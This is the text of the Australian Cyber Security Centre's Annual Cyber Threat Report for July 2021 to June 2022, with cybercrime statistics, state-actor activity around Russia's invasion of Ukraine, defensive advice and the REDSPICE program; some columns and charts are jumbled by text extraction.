Australia Annual Cyber Threat Report 2022 0

July 2021 – June 2022
Annual Cyber Threat Report

About the ACSC

The Australian Cyber Security Centre (ACSC), within the Australian Signals Directorate (ASD), leads the Australian
Government’s cyber security activities. The ACSC brings together capabilities to improve the cyber resilience of the
Australian community and help make Australia the most secure place to connect online. The ACSC’s services include:
■ the Australian Cyber Security Hotline, which is contactable 24 hours a day, 7 days a week, via
1300 CYBER1 (1300 292 371)
■ publishing Alerts, technical advice, Advisories and notifications on significant cyber security threats
■ cyber threat monitoring and intelligence sharing with our partners in Australia and overseas to counter cyber
security threats
■ Joint Cyber Security Centres (JCSCs) that support collaboration between over 80,000 Australian organisations and
individuals on cyber security issues
■ exercises and uplift activities to enhance the cyber security resilience of Australian organisations.
The ACSC acknowledges the contributions from Australian, state and territory government agencies and industry
organisations in developing this report.
3

Foreword
I am pleased to present the third Annual Cyber Threat The government considers cyber security and reinforcing
Report by the Australian Cyber Security Centre (ACSC), a key our online resilience to be a national priority. Increased
part of the Australian Signals Directorate (ASD). investment in ASD’s cyber and intelligence capabilities
under project REDSPICE (Resilience, Effects, Defence, SPace,
Throughout its 75 year history, ASD has defended Australia
Intelligence, Cyber, Enablers) positions Australia to lift our
from global threats and advanced our national interests.
defences and recognises the critical role ASD plays in our
It remains at the frontline of defending our nation and
national security.
keeping Australia safe and secure.
This report maps how threat actors across the world have
We are currently witnessing deteriorating strategic
continued to find innovative ways to deploy online attacks,
circumstances in our region and globally, including a
with supply chains used to penetrate cyber defences
military build-up unseen since World War II, and expanding
of governments and organisations in many countries,
cyber and grey zone capabilities are of particular concern.
including Australia.
In this environment, the work performed by ASD and its
The better news is that with increased collaboration across
ACSC is more important than ever.
industry, small business, and government—and with all
This expanded Annual Cyber Threat Report 2021–22 is Australians—our joint cybersecurity future and the digital
the product of insights from across the Commonwealth, opportunities before us remain bright.
with the Australian Federal Police, the Australian Criminal
In many ways, this report is the product of all Australians
Intelligence Commission, the Australian Security Intelligence
with its foundations and findings formed by reports to the
Organisation, Defence Intelligence Organisation and the
ACSC. Reporting cybercrime is vital for us to build a threat
Department of Home Affairs also contributing to help all
picture that can prevent others from falling victim to the
Australians better understand the cyber threat environment
ransomware syndicates and cybercriminals. The best cyber
and improve their cyber defences.
defence is informed by the best intelligence.
Over the last financial year and reflecting strategic
Together we can reach our ambitious goal to make
competition globally, we have all witnessed a heightened
Australia truly the most secure place to connect online. This
level of malicious cyber activity. Regrettably, too many
report is another important step forward.
Australians have also felt its impacts.
The Hon Richard Marles, MP

Deputy Prime Minister and Minister for Defence
5
ACSC Annual Cyber Threat Report 2022
Table of Contents
About the Contributors 8
Executive Summary 11
What the ACSC saw 12
What the ACSC did 14
What should individuals do? 18
What should organisations do? 19
Cybercrime and cyber security incident statistics 20

Cybercrime and cyber security incident statistics 21
The cost of cybercrime 21
Frequency of cybercrime reports 21
Cybercrime reports by state and territory 22
Cybercrime by type 23
Cyber security incident severity 26
Cyber security incidents by sector 27
State actors 28
Gaining a foothold to steal our secrets 29
Cyber operations as a geostrategic tool 30
Cyber operations in military conflict 30
Cyber risks to Australian networks 31
What the ACSC is doing 31
Russian state-sponsored cyber actors 33
How to protect yourself from state actors 33
REDSPICE34
Cybercrime36
Proliferation of threats 37
Cybercrime-as-a-Service38
Business Email Compromise 40
How to protect yourself from cybercrime 43
6

Ransomware44
Ransomware targeting 45
Ransomware tactics 45
Ransomware-as-a-Service45
Ransomware trends 47
Data breaches 48
ACSC advice on payment of ransom demands 50
Cost to victims of ransomware 50
Ransomware Action Plan 51
How to protect yourself from ransomware 51
Critical infrastructure 52
Current critical infrastructure threat 53
Critical infrastructure trends 54
Ransomware and critical infrastructure 55
Advice and support for critical infrastructure organisations 56
Critical vulnerabilities 58
Vulnerabilities being targeted faster and by more actors 59
Comparative critical vulnerabilities timelines 60
Log4j62
Patching and uplifting networks 63
Cyber defence and resilience 64

Interconnectivity brings risks and opportunities 65
What is the ACSC doing? 67
Uplifting an interconnected Australian economy 69
What can my organisation do? 70
What can individuals do? 71
Notes73
Sources 73
Glossary 73
Feedback 73
7
About the Contributors
Australian Signals Directorate

ASD’s purpose is to defend Australia from global threats and help advance
Australia’s national interests. It does this by mastering technology to inform,
protect and disrupt.
ASD delivers intelligence, cyber security and offensive operations in support of

the Australian Government and the Australian Defence Force.
Australian Criminal Intelligence Commission

The Australian Criminal Intelligence Commission (ACIC), as Australia’s national
criminal intelligence agency, works with law enforcement partners to improve the
nation’s ability to respond to crime.
The ACIC contributes to the cybercrime intelligence function within the ACSC. Its
role in the ACSC is to provide cybercrime-related criminal intelligence insights by
working closely with law enforcement, intelligence and industry security partners
in Australia and internationally.
Australian Federal Police

The Australian Federal Police (AFP) is responsible for enforcing Commonwealth
criminal law; contributing to combating complex transnational, serious,
and organised crime impacting Australia’s national security; and protecting
Commonwealth interests from criminal activity in Australia and overseas. The
AFP’s cybercrime teams within the ACSC enable the AFP to collaborate with
other ACSC partners, triage new referrals, undertake targeted intelligence
development and coordinate law enforcement responses to cybercrimes
of national significance. The AFP also leads the Joint Policing Cybercrime
Coordination Centre to harness the powers, experiences and investigative
capabilities of Australian policing jurisdictions.
Australian Security Intelligence Organisation

The Australian Security Intelligence Organisation (ASIO) is Australia’s security
intelligence service. It protects Australia and Australians from threats to their
security, including terrorism, espionage, and interference in Australia’s affairs
by foreign governments. ASIO’s cyber program is focused on investigating and
assessing the threat to Australia from malicious state-sponsored cyber activity.
ASIO’s contribution to the ACSC includes intelligence collection, investigations
and intelligence-led outreach to business and government partners.
8

C E IN T EL
DE
FE N LI G
E Defence Intelligence Organisation
NC
E
The Defence Intelligence Organisation co-leads the ACSC’s Cyber Threat

OR G
AN IS AT
Assessment team in partnership with ASD to provide the Australian Government

with an all-source, strategic, cyber threat intelligence assessment capability.
IO N
AU
STRALIA
Department of Home Affairs

The Department of Home Affairs leads cyber security policy for the Australian
Government, including developing Australia’s Cyber Security Strategy 2020 and
overseeing its implementation.
Home Affairs Cyber and Infrastructure Security Outreach officers are co-located
in the JCSCs. Outreach officers work with small and medium businesses, with a
particular focus on critical infrastructure entities, or those entities that sit within
the critical infrastructure supply chain, providing them with advice on where to
access information to uplift their cyber security and resilience.
9

Executive Summary
Over the 2021–22 financial year, the deterioration of the organisations. In 2021–22, ransomware groups stole
global threat environment was reflected in cyberspace. and released the personal information of hundreds
This was most prominent in Russia’s invasion of Ukraine, of thousands of Australians as part of their extortion
where destructive malware resulted in significant tactics. The cost of ransomware extends beyond
damage in Ukraine itself, but also caused collateral the ransom demands, and may include system
damage to European networks and increased the risk to reconstruction, lost productivity, and lost customers.
networks worldwide.
■ Worldwide, critical infrastructure networks are
In Australia, we also saw an increase in the number and increasingly targeted. Both state actors and
sophistication of cyber threats, making crimes like extortion, cybercriminals view critical infrastructure as an
espionage, and fraud easier to replicate at a greater scale. attractive target. The continued targeting of
The ACSC received over 76,000 cybercrime reports, an Australia’s critical infrastructure is of concern as
increase of nearly 13 per cent from the previous financial successful attacks could put access to essential
year. This equates to one report every 7 minutes, compared services at risk. Potential disruptions to Australian
to every 8 minutes last financial year. essential services in 2021–22 were averted by effective
cyber defences, including network segregation and
The ACSC identified the following key cyber security trends effective, collaborative incident response.
in the 2021–22 financial year:
■ The rapid exploitation of critical public
■ Cyberspace has become a battleground. Cyber vulnerabilities became the norm. Australian
is increasingly the domain of warfare, as seen in organisations, and even individuals, were
Russia’s use of malware designed to destroy data indiscriminately targeted by malicious cyber actors.
and prevent computers from booting in Ukraine. But Malicious actors persistently scanned for any network
Russia was not alone in its use of cyber operations to with unpatched systems, sometimes seeking to use
pursue strategic interests. In July 2021, the Australian these as entry points for higher value targets. The
Government publicly attributed exploitation of majority of significant incidents ACSC responded to in
Microsoft Exchange vulnerabilities to China’s Ministry 2021–22 were due to inadequate patching.
of State Security. And a joint Five-Eyes Advisory in
November 2021 confirmed exploitation of these In the face of rising threats to the digital-dependent
vulnerabilities by an Iranian state actor. Regional Australian economy, cyber defence must be a priority for
dynamics in the Indo-Pacific are increasing the risk all Australians. The most effective means of defending
of crisis and cyber operations are likely to be used by against cyber threats continues to be the implementation
states to challenge the sovereignty of others. of the Essential Eight cyber security strategies. To support
■ Australia’s prosperity is attractive to cybercriminals. this, the ACSC launched several new initiatives in 2021–22 to
According to a 2021 Credit Suisse report, Australia has improve Australia’s cyber resilience, such as a Cyber Threat
the highest median wealth per adult in the world. In Intelligence Sharing (CTIS) platform which automates
2021–22, cybercrimes directed at individuals, such as sharing of indicators of compromise. The Australian
online banking and shopping compromise, remained Government’s ten year investment in ASD, known as
among the most common, while Business Email REDSPICE, will further harden Australia’s cyber defences in
Compromise (BEC) trended towards targeting high 2022–23 and beyond.
value transactions like property settlements.
■ Ransomware remains the most destructive
cybercrime. Ransomware groups have further
evolved their business model, seeking to maximise
their impact by targeting the reputation of Australian
11
What the ACSC saw
What the ACSC saw:
An increase in financial losses due to BEC to

over $98 million
an average loss of $64,000 per report.
A rise in the average cost per cybercrime report to

over $39,000 for small business, $88,000 for medium
business, and over $62,000 for large business
an average increase of 14 per cent.
A 25 per cent increase in the number of publicly reported

software vulnerabilities
(Common Vulnerabilities and Exposures – CVEs) worldwide.
Over 76,000 cybercrime reports

an increase of 13 per cent from the previous financial year.
12

What the ACSC saw:
A cybercrime report every 7 minutes on average

compared to every 8 minutes last financial year.
Over 25,000 calls to the Cyber Security Hotline

an average of 69 per day and an increase of 15 per cent from the previous
financial year.
150,000 to 200,000 Small Office/Home Office routers

in Australian homes and small businesses vulnerable to
compromise
including by state actors.
Fraud, online shopping and online banking

were the top reported cybercrime types, accounting for 54 per cent
of all reports.
13
What the ACSC did

What the ACSC did:
Responded to over 1,100

cyber security incidents.
Blocked over 24 million malicious

domain requests
through the Australian Protective Domain Name System.
Took down over 29,000 brute force attacks against

Australian servers
through the Domain Takedown Service.
Took down over 15,000 domains hosting

malicious software
targeting Australia’s COVID-19 vaccine rollout.
Shared over 28,000 indicators of compromise with

ACSC Partners
through the Cyber Threat Intelligence Sharing platform.
14

What the ACSC did:
Collaborated with partners on 5 successful operations

against criminal online marketplaces and foreign
scam networks.
Responded to 135 ransomware incidents

an increase of over 75 per cent compared to 2019–20.
Notified 148 entities of ransomware activity on their

networks.
Conducted 49 high priority operational tasks in response

to identified and potential significant cyber threats
including scanning for vulnerable Australian devices.
Published 49 Alerts and 14 Advisories on

cyber.gov.au
which collectively saw more than 393,000 visits.
15
What the ACSC did:
Issued an Advisory urging Australian organisations to

adopt an enhanced security posture following Russia’s
invasion of Ukraine
which was updated 10 times and received more than 57,000 views, plus a
potential reach of almost 1 million people through social media.
Briefed more than 200 government, business and critical

infrastructure organisations
on the risk of collateral damage to Australian networks following the Russian
invasion of Ukraine.
Published 13 new Step-by-Step Guides

to help Australian individuals and small businesses to implement simple cyber
security practices.
Expanded the Partnership Program

to over 2,300 network partners, 3,400 business partners, and
over 82,000 home partners.
16

What the ACSC did:
Led 24 cyber security exercises

involving over 280 organisations to strengthen Australia’s cyber resilience.
Operationalised amendments to the Security of Critical

Infrastructure Act
including through new incident categorisation thresholds and changes to the
ReportCyber website.
Notified 5 critical infrastructure entities of malicious cyber

activity and vulnerabilities
potentially impacting their networks since the implementation of amendments
to the Security of Critical Infrastructure Act.
Completed the Critical Infrastructure Uplift Program

(CI-UP) pilot
and rolled out activities and tools open to all
critical infrastructure partners.
17
What should individuals do?

What should individuals do?
Follow the ACSC’s easy steps to secure your devices and

accounts including:
Update your devices

and replace old devices that do not receive updates
Activate multi-factor authentication
Regularly backup your devices
Set secure passphrases
Watch out for scams
Sign-up to the ACSC’s free Alert Service
Report cybercrime to the ACSC

at cyber.gov.au
18

What should organisations do?

What should organisations do?
For larger For smaller
organisations: organisations:
implement the ACSC’s follow the ACSC’s advice
Essential Eight mitigation for ransomware, Business
strategies, Strategies Email Compromise and
to Mitigate Cyber other threats.
Security Incidents
and the Information
Security Manual.
Review the cyber security posture of remote workers

and their use of communication, collaboration and
business productivity software.
Patch vulnerabilities within 48 hours.

If you cannot achieve this, consider using a cloud service provider or managed service provider
(MSP) that can.
Only use reputable cloud service providers and managed

service providers
that implement appropriate cyber security measures.
Sign-up to become an ACSC partner

to receive insights, advisories and advice.
Test your cyber security detection, incident response, business continuity

and disaster recovery plans.
Report all cybercrime and cyber security incidents

to the ACSC
via ReportCyber.
19
Chapter 1
Cybercrime and cyber security

incident statistics
■ Cyber security incidents responded to by the ACSC are growing in severity.
■ Cybercrime has a significant impact on organisations of all sizes; in 2021–22 the average loss
per report across businesses increased 14 per cent compared to 2020–21.
■ Cybercrime and cyber security incidents remain underreported and the ACSC urges Australian
organisations and individuals to report all cybercrimes and cyber security incidents.
Cybercrime and cyber security incident statistics
Cybercrime and cyber security incident Cybercrime can cause financial and reputational damage,
statistics disrupt business and essential services, and result in
permanent damage to an organisation. Self-reported
A cybercrime is an offence committed through or against
financial loss data as submitted to ReportCyber only
information and communications technology (ICT).
captures a small portion of the total financial impact of
Cybercrimes are either cyber enabled (using ICT to facilitate
cybercrime. It does not capture the cost to the customers of
offences such as fraud or sexual exploitation) or cyber
victims, nor the capital and recurring costs of cyber security
dependent (crimes which can only be committed via ICT,
incident remediation.
such as the use of ransomware or other malware).
A cyber security incident is an event, or series of events, Frequency of cybercrime reports

that has a significant probability of compromising an
During the 2021–22 financial year, over 76,000 cybercrime
organisation’s operations. Not all cybercrimes lead to cyber
reports were made via ReportCyber, an increase of nearly
security incidents, and the following statistics are from
13 per cent from the previous financial year. One cybercrime
2 distinct datasets: cybercrimes reported to ReportCyber,
report is made approximately every 7 minutes, compared to
and cyber security incidents to which the ACSC responded.
one report every 8 minutes in 2020–21.
The cost of cybercrime

As the volume of cybercrime increases, cybercriminal
methodology evolves, and digital transactions blur national
borders, it is becoming increasingly difficult to accurately
estimate the total cost of cybercrime.
8000
7500
7000
6500
6000
5500
5000
4500
4000
3500
3000
Jul Aug Sep Oct Nov Dec Jan Feb Mar Apr May Jun
June 20 - July 21 June 21 - July 22
Figure 1: Cybercrime reports by month for 2021–22 financial year compared with 2020–21 financial year
21
Cybercrime reports by state and territory

Australia’s more populous states continue to report more cybercrime. Queensland and Victoria report disproportionately
higher rates of cybercrime relative to their populations. However, the highest average reported losses were by victims in
the Northern Territory (over $40,000 per cybercrime report where a financial loss occurred) and Western Australia
(over $29,000).
1%
29%
11%
6%
22%
27% 2%
2%
100% 0%
Figure 2: Breakdown of cybercrime reports by assigned jurisdiction for financial year 2021–22
Note: Assigned jurisdiction is the state or territory law enforcement agency assigned to each ReportCyber report. This may differ
from the physical location of the victim.
22
Cybercrime by type
The most frequently reported cybercrimes were all cyber enabled crimes:
■ online fraud: approximately 27 per cent

■ online shopping: approximately 14 per cent
■ online banking: approximately 13 per cent.
Cyber dependent crimes, such as ransomware, were a very small percentage of total cybercrime reports. Nevertheless,
the ACSC assesses that ransomware remains the most destructive cybercrime threat. This is because ransomware has a
dual impact on victim organisations—their business is disrupted by the encryption of data, but they also face reputational
damage if stolen data is released or sold on. The public are also impacted by disruptions and data breaches resulting
from ransomware.
Other 0.37%
Ransomware 0.59%
Stalking 1.75%
ID Theft 1.79%
Image Shared 1.94% Fraud 26.90%
Malware 2.22%
Bullying 2.58%
Harassment 2.60%
Threat 2.64%
Shopping 14.40%
Romance 3.01%
Bulk Extortion 3.93%
Selling 4.36%
Online Banking 12.60%
BEC 6.12%
Investment 12.20%
Figure 3: Cybercrime reports by type for financial year 2021–22
23
Cybercrime loss by organisation size

Medium-sized businesses (defined by Australian Bureau of Statistics as between 20 and 199 employees) had the highest
average loss per cybercrime report where a financial loss occurred.
This may be because they were less likely than large organisations to apply cyber security mitigations as outlined in the
ACSC’s Strategies to Mitigate Cyber Security Incidents. These strategies decrease the likelihood and impact of cyber
incidents. In addition, medium-sized organisations may be more likely to report cybercrime to ReportCyber, as they are less
likely than larger organisations to have sufficient in-house or commercial incident response capabilities. The ACSC urges
organisations to report all cybercrime, irrespective of the financial loss incurred, as it helps to better understand and defend
against the threat.
$100,000
$88,407
$90,000
$80,000
$70,000
$62,233
$60,000
$50,000
$39,555
$40,000
$30,000
$20,000
$10,000
$0
Small Business Medium Business Large Business
Figure 4: Cybercrime reports and average reported loss by organisation size for financial year 2021–22
Note: The 2021 Annual Cyber Threat Report averaged financial loss across all cybercrime reports. This year’s Report averages only
those cybercrime reports where financial loss occurred. The ACSC assesses that excluding reports where no financial loss occurred
provides more accurate and actionable data for businesses.
24
Calls to the ACSC

The number of calls to 1300 CYBER1 has continued to increase. The ACSC received more than 25,000 calls in the 2021–22
financial year, an average of 69 calls per day. This is a 15 per cent increase on the 2020–21 financial year and over a four-fold
increase from the 2019–20 financial year, when the ACSC received 5,300 calls.
3000
2500
2000
1500
1000
500
0
Jul Aug Sep Oct Nov Dec Jan Feb Mar Apr May Jun
Financial year 20–21 Financial year 21–22
Figure 5: Call volumes for financial year 2021–22 compared with financial year 2020–21
25
Cyber security incidents

During the 2021–22 financial year, the ACSC responded to over 1,100 cyber security incidents, an average of 21 cyber security
incidents per week. Compared to the 2020–21 financial year, this is a decrease of 36 per cent. This does not mean that
the cyber security threat to Australian organisations has decreased, especially as the number of cybercrime reports has
increased. The expansion of Australia’s commercial incident response sector means incidents which may have previously
required an ACSC response may now be being handled by in-house or contracted incident response teams.
Cyber security incident severity

The ACSC categorises each incident it responds to on a scale of Category 1, the most severe, to Category 6, the least severe.
Incidents are categorised on severity of effect, extent of compromise, and significance of the organisation.
The number and severity of cyber security incidents in the 2021–22 financial year is not directly comparable with
previous financial years, as the ACSC introduced a new incident categorisation scale in March 2022. This was due to the
introduction of mandatory incident reporting for Regulated Critical Infrastructure under amendments to the Security of
Critical Infrastructure Act 2018 (SoCI Act). Changes included simplifying the scale, prioritising incidents related to Critical
Infrastructure and Systems of National Significance networks and refining definitions of cyber effects and impacts.
The severity of cyber security incidents is increasing. Nearly 15 per cent of incidents in the 2021–22 financial year were
categorised as C3, up from approximately 6 per cent in the previous financial year. This is partly attributable to the category
changes, but also to an increase in attacks by cybercriminals on larger organisations and an increased impact on victims.
Attacks included the exfiltration of sensitive data and the movement by malicious actors across multiple segments of
affected networks.
Sustained disruption of essential

systems and associated services 1
C6 C5 C4 C3 C1 C1
Extensive compromise
1 14 28 2
C6 C5 C4 C3 C2 C1
Isolated compromise
4 28 72 75 26
C6 C5 C5 C3 C3 C2
Coordinated low-level
malicious attack 15 40 33
C6 C6 C5 C4 C3 C3
Low-level malicious attack

4 116 146 137 64
C6 C6 C5 C4 C4 C3
Unsuccessful low-level
malicious attack 1 29 35 62 152 35
C6 C6 C6 C6 C6 C6
Member(s) of Small Medium-sized State Federal National

the public organisations organisations Government Government security
Sole traders Schools Academia/R&D Government Systems of
shared services national
Local Large significance
Regulated
Government organisations
critical
Supply chain infrastructure
Figure 6: Cyber security incidents by incident category for financial year 2021–22
26
Cyber security incidents by sector

Excluding government sectors—which have some additional reporting obligations—the health care and social assistance
sectors reported the highest number of cyber security incidents during the 2021–22 financial year. Compared to the 2020–21
financial year, the retail sector dropped out of the top 10, replaced by the electricity, gas, water and waste service sector.
The top 10 reporting sectors accounted for approximately 75 per cent of all incidents for the 2021–22 financial year. As such,
these sectors are a focus for ACSC partnership and outreach activities.
Government – Commonwealth 24%
Government – State/Territory/Local 10%
Health Care and Social Assistance 9%
Information Media and Telecommunications 8%
Education and Training 7%
Professional, Scientific and Technical Services 7%
Construction 4%
Manufacturing 4%
Financial and Insurance Services 4%
Electricity, Gas, Water and Waste Services 3%
Figure 7: Cyber security incidents to which the ACSC responded in financial year 2021–22, top 10 industry sectors
Note: The reporting frequency of government agencies is in part due to their obligations to report significant cyber security incidents
to the ACSC, and may not necessarily reflect a greater susceptibility to cyber security incidents.
27
Chapter 2
State actors
■ Russia’s invasion of Ukraine has increased the cyber threat globally.
■ Malicious state actors continue to seek sensitive information, including by targeting Australian
small businesses and individuals.
■ Most compromises identified by the ACSC used relatively simple tradecraft which could have
been prevented by enhanced cyber security.
State actors
Gaining a foothold to steal our secrets

In 2021–22, state actors continued to engage in malicious of state actors due to its regional and global interests,
cyber operations as an efficient method of political international partnerships and participation in multilateral
and economic espionage. State actors seek sensitive forums. This cyber espionage is often conducted or directed
information—including personally identifiable information by foreign intelligence services seeking information from
(PII)—to support their government’s intelligence public and private networks across Australia, including
requirements. But these actors do not just want classified political, diplomatic, military, technological and commercial
information. They also want to understand who we are, data, as well as personal data from individual Australians.
how we connect with each other, and what values we hold.
The ACSC collaborated with Australian, state and territory
Furthermore, in some cases, they may seek to pre-position
government agencies to ensure events such as the Census
in strategic networks to prepare for coercive or disruptive
and state and federal elections were resilient to malicious
activity against us.
cyber activity by state or criminal actors.
Over the past financial year, Australia continued to be
the target of persistent cyber espionage by a wide range
Case Study: ACSC support to the Census

The Australian Bureau of Statistics (ABS) ran the Census in August 2021. ABS systems are an attractive target for malicious
actors, including state actors, as they hold personal information about Australians.
The ABS was particularly concerned with maintaining the availability of the Census systems, the confidentiality of
Australians’ information, and the integrity and utility of the collected data. The ACSC provided a range of services to the ABS
to assess and improve the cyber security of its systems.
Prior to the Census, the ACSC provided ABS with threat intelligence briefings. The ACSC also employed its active cyber
defence capabilities to assess and pre-empt malicious cyber activity against the Census.
The ACSC conducted a review of ABS systems, including a source code review and penetration testing to detect cyber
security vulnerabilities, and analysis to detect if there was malicious activity already on the system. Recommendations
resulting from the review were provided to the ABS.
Throughout the Census, the ACSC monitored ABS systems to help detect and respond to threats. On Census night, the ACSC
provided on-site operational support to bolster any critical incident response.
The ACSC found no indication of malicious activity through its assessments, and critical cyber security recommendations
were resolved by the ABS prior to the Census. The Census was completed without any cyber security incident or disruption
to services.
29
While state actors have access to a wide range of Some countries are acquiring cyber capabilities which
sophisticated and bespoke capabilities, the majority of can ‘hold-at-risk’ the networks other countries rely on. To
compromises the ACSC observed used relatively simple ‘hold-at-risk’ is to demonstrate the capability to overcome
tools and techniques. These include spear phishing, the defences of another country, to undermine confidence
targeting third-party service providers and exploiting in networks and enable state actors to cripple essential
unpatched or misconfigured systems using public services in the event of a conflict.
vulnerabilities. The exploitation of public vulnerabilities is
low cost and scalable, and exploits can be deployed within
Cyber operations in military conflict
hours of a patch release or technical write up. Exploiting
public vulnerabilities also avoids the need to use zero-day Russia’s invasion of Ukraine has altered the geopolitical
exploits—vulnerabilities that have not been disclosed or balance in ways that could expose organisations to
patched by the software vendor—allowing state actors to increased malicious cyber activity.
preserve these for use against the highest value targets.
Ukrainian government officials have acknowledged they
State actors will likely continue to use simple tools and
are fighting a dual war—one on the ground and one in the
techniques to target government and business networks for
digital realm. Cyber operations have been used as a tool
as long as it remains effective, inexpensive and scalable.
of war alongside a major ground offensive, with malicious
cyber activity against Ukrainian networks before and during
Cyber operations as a geostrategic tool the conflict.
The Indo-Pacific is at the centre of geostrategic competition, Ukraine has experienced an onslaught of sustained
and cyber operations are a valuable tool in this contest. disruptive cyber activity, including distributed denial of
Some countries use cyber operations to gain advantage service (DDoS) attacks. While the impact of this malicious
by stealing other nations’ security secrets and intellectual activity has been mitigated by Ukraine’s cyber defensive
property at a greater scale than in the past. They can measures, it still has the potential to cripple essential
also use cyberspace to sow disinformation, interfere in services and have cascading effects. In the first 6 weeks of
economies and shape public sentiment. If necessary, states the invasion, at least 8 variants of destructive malware were
can launch cyberattacks that sabotage and destabilise identified, including wiper malware designed to erase data
their adversaries. Much of this can be done covertly, at and prevent computers from booting.
relatively low cost and in ways that make it hard for other
states to deter or respond. Against this backdrop, the integration of cyber operations
into conventional war has drawn non-traditional
Cyberspace itself has become a battleground. Some combatants and civilian entities into the conflict. Criminal
countries in our region continue to strain the norms and syndicates and issue-motivated groups have conducted
institutions that govern cyberspace as a global commons. activities in support of Russian or Ukrainian interests,
These countries have increasingly cut access to the open independent of Russian and Ukrainian government chains
internet and used digital tools to repress freedoms. These of command. Issue-motivated groups have made claims
countries seek to export their approach and impose it of successful attacks against government and private
on others by undermining international standards and networks, including exfiltration and posting of data on
technical protocols. Australia opposes these actions and the darkweb. Such activities facilitate future potential
is committed to a free and open Internet. In April 2022, cyberattacks by malicious state and non-state actors.
Australia joined over 60 other nations in launching A
Declaration for the Future of the Internet, which describes Pages 30 and 31 record a subset of the malicious cyber
our position on the potential for digital technologies to activity which occurred in the first 60 days of the war.
uphold the values that promote connectivity, democracy, Disruptive activities continue unabated, and escalating
and the rule of law. geopolitical tensions will likely see the continued use
of cyber effects as a means of dissuasion, disruption,
Cyberspace is also a joint warfighting domain, with cyber degradation or denial.
effects increasingly incorporated into military operations.
30
State actors
Cyber risks to Australian networks

Russia’s invasion of Ukraine demonstrated the real threat of On 23 February 2022, the ACSC released an Alert and
disruptive and destructive cyber operations, including the an Advisory urging Australian organisations to urgently
potential for third parties to suffer collateral damage. Some adopt enhanced cyber security postures by prioritising the
Russian cyber operations impacted beyond their primary following actions:
target sets. For example, a 24 February 2022 attack on a
■ patching applications and devices
satellite communications company had spillover effects
across geographic borders. In addition to causing outages ■ implementing mitigations against phishing and spear
across Ukraine, this attack disabled over 10,000 satellite phishing attacks
communications terminals outside Ukraine, including
■ ensuring that logging and detection systems are fully
terminals that supported the operation of wind turbines
updated and functioning
and internet services for private citizens.
■ reviewing incident response and business
Previous cyberattacks against Ukraine have also had
continuity plans.
international consequences—such as the NotPetya malware
in 2017, which affected companies worldwide, including
In cooperation with our international partners from
in Australia. Russian cyber actors may conduct malicious
Canada, New Zealand, the UK and the US, on 21 April 2022,
activity as a response to military materiel support provided
the ACSC released a joint Advisory specifically on Russian
by the US, UK, Australia and other partners, as well as the
state and cybercriminal threats to critical infrastructure.
economic costs imposed on Russia.
The Advisory urges critical infrastructure network operators
Australia would be vulnerable in future regional or global to prepare for and mitigate potential cyber threats by
conflicts to cyber operations that target the supply chains hardening their cyber defences and performing due
that Australian systems depend upon. This would be the diligence to identify indicators of compromise.
case even if Australia were not directly involved. There
In addition, the ACSC has increased engagement with
would probably be little warning of such disruption.
international partners to share tactics and techniques, and
Australian network owners need to consider how to secure
worked closely with industry partners to share knowledge
their critical systems and protect their sensitive information;
of the threat environment. The ACSC briefed more than 200
for instance, through improved segmentation between their
business organisations on the risk of collateral damage
corporate and operational networks.
to Australian networks following the Russian invasion of
Ukraine, and has also provided multi-classification threat
What the ACSC is doing briefings to government and critical infrastructure partners.
In the lead-up to the invasion, DDoS attacks targeted Beyond the immediate threat presented by Russia’s invasion
Ukraine’s finance sector and banks. On 20 February 2022, of Ukraine, the ACSC works to counter the risk of malicious
Australia joined the US and UK in publicly attributing these activity by a wide range of state actors.
cyberattacks to the Russian General Staff Main
Intelligence Directorate.
By the end of the 2021–22 received more than
financial year, the Advisory 57,000 views,
had been updated
10 times.
and had a potential reach
of more than
950,000 users
through ACSC’s social
media platforms.
31
Malicious cyber activity in first 60 days of

Russia’s invasion of Ukraine
Europe
Whole of economy
■ DDoS attack against major

Telecommunications provider
■ Phishing campaigns launched against
European citizens
Government
■ Phishing campaign against European

governments and militaries
■ Phishing campaign targeting officials
helping evacuate Ukrainian refugees
Ukraine
Whole of economy
■ Ransomware attacks on
Ukrainian citizens
■ DDoS causes severe outages to Media
and Telecommunications sector
■ Phishing campaign targeting
Ukrainian media
Government
■ Malware and DDoS attacks on

Ukrainian government departments
■ Mass phishing campaign against
Ukrainian government and
military personnel
32
State actors
Russian state-sponsored cyber actors

Russian state-sponsored cyber actors have demonstrated capabilities to compromise ICT networks, develop mechanisms
to maintain long-term, persistent access to ICT networks, exfiltrate sensitive data from ICT and Operational Technology
(OT) networks, and disrupt critical infrastructure systems and OT functions by developing destructive malware.
Numerous Russian government and military organisations have the capability to undertake cyber operations against ICT
and OT networks, including elements of:
The Russian Foreign The Russian General

The Russian Federal The Russian Ministry
Intelligence Service Staff Main Intelligence
Security Service (FSB) of Defence
(SVR) Directorate (GRU)
United States
Russia
Government
Government
■ DDoS attack on Ukrainian embassies,
■ DDoS attacks on Russian government including in the US
and state-owned enterprises such as
media and banks
■ Issue-motivated groups exfiltrate
emails and documents from
Russian entities
What you should do
How to protect yourself from state actors
Individuals and organisations are not just targeted for their own data holdings; their networks can
be weaponised against others. For example, in 2021–22 personal devices and small office or home
office (SOHO) routers were used by foreign intelligence services to conduct espionage and theft
of intellectual property. Malicious actors can use these routers to conduct person-in-the-middle
compromises or as a vector to target other networks. The ACSC estimates that at least 150,000 to
200,000 devices in Australian homes and small businesses are vulnerable.
Small businesses and individuals should prioritise automated updates, which help prevent network
compromises by even the most sophisticated actors. The ACSC also provides step-by-step guides
to secure your accounts and devices at cyber.gov.au. Larger organisations should continue to
implement the Essential Eight cyber security strategies.
33
REDSPICE
■ The global strategic environment is deteriorating.
■ The rapidly advancing technological landscape presents great opportunities but also serious threats.
■ Cyberspace is of increasing importance to warfare and national security.
REDSPICE
REDSPICE (Resilience, Effects, Defence, SPace, Intelligence, Cyber, Enablers) will be pivotal to addressing future cyber
threats. REDSPICE will expand the range and sophistication of ASD’s intelligence, offensive and defensive cyber capabilities,
and deliver forward-looking capabilities essential to maintaining Australia’s strategic advantage and capability edge over
the coming decade and beyond. It will:
■ help anticipate and prevent a crisis

■ block sophisticated cyberattacks against Australian critical infrastructure
■ provide offensive capabilities that equip government with retaliatory options
■ ensure Australia’s cyber and intelligence capabilities remain resilient to attack.
3X current offensive
cyber capability 2X
persistent
cyber-hunt
activities
The REDSPICE investment will help train a new generation of cyber and intelligence experts to protect Australia from
cyber adversaries.
Analysts
4X
1900 new analyst,
Advanced AI, technologist,
global
Create our edge, solve the problems others cannot.
Technologists
machine learning and and
corporate, footprint
cloud technology
enabling roles Use emerging and cutting-edge technology and big
data to solve complex problems.
across Australia
and the world Corporate &
Enabling Services
1900 new analyst,
technologist,
Enable our purpose.
34
